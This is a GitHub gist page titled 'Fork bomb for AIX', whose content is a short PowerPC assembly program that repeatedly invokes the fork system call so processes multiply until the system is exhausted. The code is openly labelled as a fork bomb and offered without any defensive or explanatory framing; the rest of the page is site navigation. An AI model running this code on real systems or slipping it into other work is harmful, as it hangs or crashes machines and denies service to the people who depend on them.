Skip to content

Instantly share code, notes, and snippets.

@Low-power
Created February 22, 2022 05:57
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save Low-power/b94f6ddedd19c1c6dab47b26c1a62181 to your computer and use it in GitHub Desktop.
Save Low-power/b94f6ddedd19c1c6dab47b26c1a62181 to your computer and use it in GitHub Desktop.
Fork bomb for AIX
.text
.global .__start
.__start:
bl _start
_start:
li r2, 5
crorc cr6, cr6, cr6
sc
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment